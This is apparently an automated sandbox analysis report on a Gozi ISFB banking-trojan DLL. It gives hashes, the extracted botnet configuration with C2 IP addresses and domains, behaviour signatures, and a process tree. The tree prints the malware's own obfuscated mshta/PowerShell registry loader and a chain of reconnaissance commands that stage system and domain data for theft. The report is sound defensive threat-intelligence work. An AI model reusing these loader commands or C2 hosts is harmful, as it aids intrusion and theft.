Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-08-2022 09:29

General

  • Target

    62ea3f935563b.dll

  • Size

    300KB

  • MD5

    614e312af0e5de7c6b9819e3a1c766d4

  • SHA1

    01e384618d8eadb244184e66e6450752ea0ceade

  • SHA256

    982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

  • SHA512

    362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3452
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3752
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4732
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nju8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nju8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3944
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vvxjvnatxo -value gp; new-alias -name yfnjcifda -value iex; yfnjcifda ([System.Text.Encoding]::ASCII.GetString((vvxjvnatxo "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2160
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5056
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9625.tmp" "c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP"
            5⤵
            PID:3696
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3472
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp" "c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP"
            5⤵
            PID:4788
    • C:\Windows\system32\cmd.exe
      cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get domain
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4148
      • C:\Windows\system32\more.com
        more
        3⤵
        PID:4912
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
      2⤵
      PID:4916
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:3408
    • C:\Windows\system32\cmd.exe
      cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4476
      • C:\Windows\system32\systeminfo.exe
        systeminfo.exe
        3⤵
        • Gathers system information
        PID:1308
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:2092
    • C:\Windows\system32\cmd.exe
      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\system32\net.exe
        net view
        3⤵
        • Discovers systems in the same network
        PID:5116
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:2328
    • C:\Windows\system32\cmd.exe
      cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Windows\system32\nslookup.exe
        nslookup 127.0.0.1
        3⤵
        PID:1160
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:3956
    • C:\Windows\system32\cmd.exe
      cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3248
      • C:\Windows\system32\tasklist.exe
        tasklist.exe /SVC
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2860
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:3700
    • C:\Windows\system32\cmd.exe
      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:3692
      • C:\Windows\system32\driverquery.exe
        driverquery.exe
        3⤵
        PID:3472
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:2120
    • C:\Windows\system32\cmd.exe
      cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:2336
      • C:\Windows\system32\reg.exe
        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
        3⤵
        PID:1556
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:1792
    • C:\Windows\system32\cmd.exe
      cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:2140
      • C:\Windows\system32\net.exe
        net config workstation
        3⤵
        PID:796
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 config workstation
          4⤵
          PID:4252
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:4996
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:1088
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts
        3⤵
        PID:3592
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:1124
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:1208
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts /all_trusts
        3⤵
        PID:2920
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:4356
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:4852
      • C:\Windows\system32\net.exe
        net view /all /domain
        3⤵
        • Discovers systems in the same network
        PID:4476
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:3312
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:1704
      • C:\Windows\system32\net.exe
        net view /all
        3⤵
        • Discovers systems in the same network
        PID:696
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:1808
    • C:\Windows\system32\cmd.exe
      cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\80C6.bin1 > C:\Users\Admin\AppData\Local\Temp\80C6.bin & del C:\Users\Admin\AppData\Local\Temp\80C6.bin1"
      2⤵
      PID:3952
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:4544

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.dll

    Filesize

    3KB

    MD5

    929399503519dcbb0b02be8c65c3b3ca

    SHA1

    3b017d0db8bd09320e0523dc51388fd87ba6cd4d

    SHA256

    adbb52f5a1c2eac7517deaf63d3a59e345e66c07537bd8cda39944ebcc9e0639

    SHA512

    6c5845741449c8ac32b3364cdca8e037b7a8092cc5ec956a3fd5c3983ab90b637e79ed99ec669abb7955d3084d9b7b4c28e273ef0a25bcdbc6cc493432a91d6d

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin

    Filesize

    65KB

    MD5

    6bd79a5adab7a3e2068c0427e0e4b70c

    SHA1

    d4159171c427cdd8e11336d21666960b3624f178

    SHA256

    bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b

    SHA512

    34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    2KB

    MD5

    7127823022c7a932f96be727f3ddc34a

    SHA1

    a29cdec64f59727a5eaedf30cb98f5444aa4249d

    SHA256

    2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f

    SHA512

    2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    2KB

    MD5

    7127823022c7a932f96be727f3ddc34a

    SHA1

    a29cdec64f59727a5eaedf30cb98f5444aa4249d

    SHA256

    2afe6030d85ec57f1ac34b8f317ab0751a5a915da72a71b55d9adbdbd359618f

    SHA512

    2eb02688328b99d391c498fed2c0d56906c2d57d50bb1764c9c31764fbbda8104fdd5c3f8e416dc5c58881c4b849896c850a25b9c37390b9a449f6e214eb18b9

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    2KB

    MD5

    a5f20a41aab2cab03bd597d49d14f77e

    SHA1

    49366784d753ad7071d4a45682499d395fca5f25

    SHA256

    18bc37c219505ce44a8b8c77941eb2f901da13de2e4a7741b8efcf67e25bb121

    SHA512

    fa382a6f8a55a7553c112d243e9178f348b397a7af6dc5a66213641554dd28ee7074f4015615bcf9fd9f82ba7906b7fff953ab91de05e9d9368b7d4393a807b1

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    2KB

    MD5

    b19ff771046a3c130ed5b585522e87f7

    SHA1

    dc7fbb6af7033c894904b51f855862723cdaa161

    SHA256

    73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b

    SHA512

    5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    2KB

    MD5

    b19ff771046a3c130ed5b585522e87f7

    SHA1

    dc7fbb6af7033c894904b51f855862723cdaa161

    SHA256

    73624a2761213f03c5bafdc9c5de10b915b96a365497af8ac3fc33a202bd414b

    SHA512

    5977853b1ae7eabe57d01e6cc3253cdb9ee9e7fa7a927c9f1af452f67b0fff404425f5eca29f5f7c7cf8ef54a473087cade26a3f17c88eced85c768baac73e1f

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    9KB

    MD5

    6d6a8b3f318fd3d8cef74f5a606d175b

    SHA1

    bbf142b78df2ef8bae740e28e29499f98f443144

    SHA256

    6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add

    SHA512

    3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    9KB

    MD5

    6d6a8b3f318fd3d8cef74f5a606d175b

    SHA1

    bbf142b78df2ef8bae740e28e29499f98f443144

    SHA256

    6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add

    SHA512

    3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    35KB

    MD5

    f970ec5d20d2fba20631ebcd079bde53

    SHA1

    a68f1ea0ac316fecc6d140097950a86c203a48e4

    SHA256

    4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4

    SHA512

    9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    35KB

    MD5

    f970ec5d20d2fba20631ebcd079bde53

    SHA1

    a68f1ea0ac316fecc6d140097950a86c203a48e4

    SHA256

    4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4

    SHA512

    9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    64KB

    MD5

    b14ca353fa4187bac21f5ab89ba9a11c

    SHA1

    fed2d6b01963a4aac5ec7942f5d7e09ca6ddf310

    SHA256

    0f629f4157821999e27bbd0f8fd0443d62589646daa6cbd165292a876194c943

    SHA512

    ba1c82cb93e0c33574c806a6680e2594e30d4af8c90379b36ae46199d4e19d9ba7a0eb46f1b120398c810f84ec673f12b164ef39049235bb4b12e0b6a1965905

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    64KB

    MD5

    714de7881b6a1035c086c517850de473

    SHA1

    2f7d0b5388ae3169c976b82a41a6463d83b2c635

    SHA256

    d14c84a41e44ae9c73535af482c1e7fae5db45c1400fab66f8b7dcec66ac900e

    SHA512

    4150c13a5c1b598965ad8cf5aa98d0e23405fecb7c2917598621c375fcaa7afeb22b1e588fb06ed1ab63b462a6ea8bfbebf56b7ff62290dba4bf35bdee6e79c9

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

    Filesize

    64KB

    MD5

    f598a0e91678e4a3ab5262f92a2fc126

    SHA1

    faf8e24e200debcb4ea8c1a5fc97d3428e0981c5

    SHA256

    e426336dfe2774f86b7cb3c1962a86d5eae6c7c22f4d4117edf3d819eda8bc3b

    SHA512

    199dfc3cf019979c8146c873d06b5e0b8a893db0adb0dc4e2e27231801b9e9ea47335144bd2357b81ab4ab1ed03e854020c84e41f2b45519e149255578bb1101

  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    491781928626aa6de588e5e1e944e765

                                                                    SHA1

                                                                    38b2d33c01fc8fa99b7fa029d9cf54d803118030

                                                                    SHA256

                                                                    1031f0822bb6b82b229e312d363c79c6f513c5dd9eab88a545e8e897d5728571

                                                                    SHA512

                                                                    2118849ffbbfdb731041b3d05516083fe386541fadf2908eff0935620f8d4076e79581896465da11f74331d812c633c73da184f80e75343f3df7c3e9b7b75f8f

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    855fc1aa369e8cc7fce0b1957427918e

                                                                    SHA1

                                                                    20e2a9272e85fdc40a08cbf4dbba9e6d3d7f8fa4

                                                                    SHA256

                                                                    a6326c7a78fd3240e9ee70e2666ee60dcbbac5f24d642d9038a8075542009c20

                                                                    SHA512

                                                                    2b69fb54aa6fbba546c9339b5efbf675e3ba25f661158bf609ba63ca6f96241ff01aec9c34415a09b42606a6864ecdef941a767d1f3994845605c078ff45f11a

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    44d578ac531f2f93c3a515e3f72a4e62

                                                                    SHA1

                                                                    7517f39370ac5fc4a80c7572d3a5c15aebe0fb2f

                                                                    SHA256

                                                                    64b087f809be517e84779845447554cf9103bc52953202f330d84f24ae252838

                                                                    SHA512

                                                                    4bf075c425a9f4d6b5869e91ec533de5a2d15c8a1d8fb9b5c39f1b49b555629a4720ce65e4323bf6c84fd6b3083392e387ce7f6386b5f1c96280ef727d2b736d

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    561bef9af1d2b3cd08f865fe88ed8b87

                                                                    SHA1

                                                                    de383abc60321ffa36cb8d718bdc9205b4300764

                                                                    SHA256

                                                                    8f60e06f4a1d259c2cbe505612fa9b4972a8d04703f95ec9baa42d57e6d37463

                                                                    SHA512

                                                                    03da980c68887047560a3b305c23b9ffc067b1798bca12a94390af6573ce3d9acbd55c696bd602e83075bb599d61e32da1c7d5312a20c0ea3515207a3715820d

                                                                  • C:\Users\Admin\AppData\Local\Temp\80C6.bin1

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    6bd79a5adab7a3e2068c0427e0e4b70c

                                                                    SHA1

                                                                    d4159171c427cdd8e11336d21666960b3624f178

                                                                    SHA256

                                                                    bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b

                                                                    SHA512

                                                                    34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e

                                                                  • C:\Users\Admin\AppData\Local\Temp\RES9625.tmp

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    1ca03a1553f812f0678f5b98f50ea950

                                                                    SHA1

                                                                    c987674ceb9b3d027fb76bb53ed76afe05fe9f1b

                                                                    SHA256

                                                                    96d987b9edd809d181bbea3c6311a66bd9654a27dc1d4d35f05f40783aa446b3

                                                                    SHA512

                                                                    f132989e5f2eb20b61259544746eec2aad0aca903da18b3d0d646ef6dfc2c9f81b1b2a5031c50a2890b4b133bf03e19b494d816583fa255109862b1070851f48

                                                                  • C:\Users\Admin\AppData\Local\Temp\RES96D1.tmp

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    9c1e57a168ffbe153f29f31014779080

                                                                    SHA1

                                                                    6388960cee0042722bde558269e7717a2a47651f

                                                                    SHA256

                                                                    3351f350fc93dbabef3b4ae0ef2a164b056c1d44a356cc4f5c3d851b7af609ae

                                                                    SHA512

                                                                    d0174befbb77cfcf4108362abeab7d116a1383a35cbfc183c41e057ec674f4831e79abf00f1bfcbefccca062a699d8df14a75ad64e990ba01aacf813dbe2fb5a

                                                                  • C:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.dll

                                                                    Filesize

                                                                    3KB

                                                                    MD5

                                                                    e116c9d2033d807e7e238b4ef1b62441

                                                                    SHA1

                                                                    fd4a8a21145c7f14175ddf512a5ae51fdbd5fd5d

                                                                    SHA256

                                                                    a4685e10bc3da377f654b68bd161c8bd97be457743fb2b6dba04ec5d47df03e9

                                                                    SHA512

                                                                    a852a55a7701571fa02b653fda04a682a83de09dcfc781a66f96e5eb927b0d45e0b775e00162eafd5127e2459c6c5abd03b9d8f08bda2ae629691d7d24d71229

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.0.cs

                                                                    Filesize

                                                                    400B

                                                                    MD5

                                                                    aca9704199c51fde14b8bf8165bc2a4c

                                                                    SHA1

                                                                    789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                    SHA256

                                                                    cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                    SHA512

                                                                    a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\4psv2yna.cmdline

                                                                    Filesize

                                                                    369B

                                                                    MD5

                                                                    9ec4f73902f40ee643aaa0697b535eff

                                                                    SHA1

                                                                    7bea1ea1aceab43bfa0345aabc5936818b2229a9

                                                                    SHA256

                                                                    146619eb310e9d43a5d2c03943336d8fc77eb2d786b02c68082aa6ccc04a4cc9

                                                                    SHA512

                                                                    5489f12f36cfe5a0c6af91a0b2083dada40debeb7e20745c241f8ed24986c7d483ce18c19821e9e89c73be4196de9f20d6881df6066edc9da50522dca72aeb80

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\4psv2yna\CSC93A0155896EB444294CFA73FFC9517FC.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    007da9aaa12d1c816666f84ca72ec4f1

                                                                    SHA1

                                                                    34d50bd86ddf66c225bcd5ba9c14ffef879f018d

                                                                    SHA256

                                                                    36fdaee98e5341b537ec8c09357bdd90dcec22bb81b4b7e5782d0d85b29b8380

                                                                    SHA512

                                                                    a73d6892ad244b0cd638cf1203f0a60f1136fdc5fb1a499ff35bf3170428ef2f6ee9fd5998a101e9122f7352ecfd22ac0f33cdb220dad34b6fac1399a8b0e5d7

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\CSCB25259DA0BF41C685C145E7B77F9D39.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    9ebd13fda96930a951c29c9803189680

                                                                    SHA1

                                                                    89a6da69cd5ca511ac20a150ef2849474513e647

                                                                    SHA256

                                                                    159f13f12ded6836e650aafe4ae2c8e4bb4c4e6e2d57d7aec584afa5830118b1

                                                                    SHA512

                                                                    9219145b9c53edd6ec84bb30cc9f7046e674355a0168f893337807d54fa6ebc5c53f7aedc4fab7cfc00ecc0179bfa0d33e778868791c8374e4cfc22f5bfa8a30

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.0.cs

                                                                    Filesize

                                                                    410B

                                                                    MD5

                                                                    9a10482acb9e6952b96f4efc24d9d783

                                                                    SHA1

                                                                    5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                    SHA256

                                                                    a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                    SHA512

                                                                    e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\z3qafhng\z3qafhng.cmdline

                                                                    Filesize

                                                                    369B

                                                                    MD5

                                                                    0fd42ad9d1fcf2ecc458caeea500074d

                                                                    SHA1

                                                                    f6253dae00cd2c7e74d65c5bfb97df4d4afd0695

                                                                    SHA256

                                                                    b8d79550fe87187ab73bd3a2e17bcc4c9daea4c771359d86af0969a0068fe610

                                                                    SHA512

                                                                    161e119ec04a2ecc61fa153545586f39c78db2eabcc821953129abbe04790cc62dbae8a4a91d3ed84c799662d4836d0c50769b404fb43dc8ccdda2375495e135

                                                                  • memory/696-228-0x0000000000000000-mapping.dmp

                                                                  • memory/796-210-0x0000000000000000-mapping.dmp

                                                                  • memory/1032-161-0x00000000085F0000-0x0000000008693000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/1032-186-0x00000000085F0000-0x0000000008693000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/1032-173-0x000000000A5D0000-0x000000000A70B000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/1032-177-0x000000000A710000-0x000000000A84A000-memory.dmp

                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/1088-214-0x0000000000000000-mapping.dmp

                                                                  • memory/1124-217-0x0000000000000000-mapping.dmp

                                                                  • memory/1160-190-0x0000000000000000-mapping.dmp

                                                                  • memory/1208-218-0x0000000000000000-mapping.dmp

                                                                  • memory/1224-188-0x0000000000000000-mapping.dmp

                                                                  • memory/1308-172-0x0000000000000000-mapping.dmp

                                                                  • memory/1556-205-0x0000000000000000-mapping.dmp

                                                                  • memory/1704-226-0x0000000000000000-mapping.dmp

                                                                  • memory/1792-206-0x0000000000000000-mapping.dmp

                                                                  • memory/1808-229-0x0000000000000000-mapping.dmp

                                                                  • memory/2092-181-0x0000000000000000-mapping.dmp

                                                                  • memory/2120-201-0x0000000000000000-mapping.dmp

                                                                  • memory/2140-208-0x0000000000000000-mapping.dmp

                                                                  • memory/2160-141-0x0000019673A50000-0x0000019673A72000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/2160-142-0x00007FFC24FB0000-0x00007FFC25A71000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/2160-158-0x0000019673DE0000-0x0000019673E1D000-memory.dmp

                                                                    Filesize

                                                                    244KB

                                                                  • memory/2160-140-0x0000000000000000-mapping.dmp

                                                                  • memory/2160-157-0x00007FFC24FB0000-0x00007FFC25A71000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/2328-187-0x0000000000000000-mapping.dmp

                                                                  • memory/2336-203-0x0000000000000000-mapping.dmp

                                                                  • memory/2808-183-0x0000000000000000-mapping.dmp

                                                                  • memory/2860-195-0x0000000000000000-mapping.dmp

                                                                  • memory/2920-220-0x0000000000000000-mapping.dmp

                                                                  • memory/3248-193-0x0000000000000000-mapping.dmp

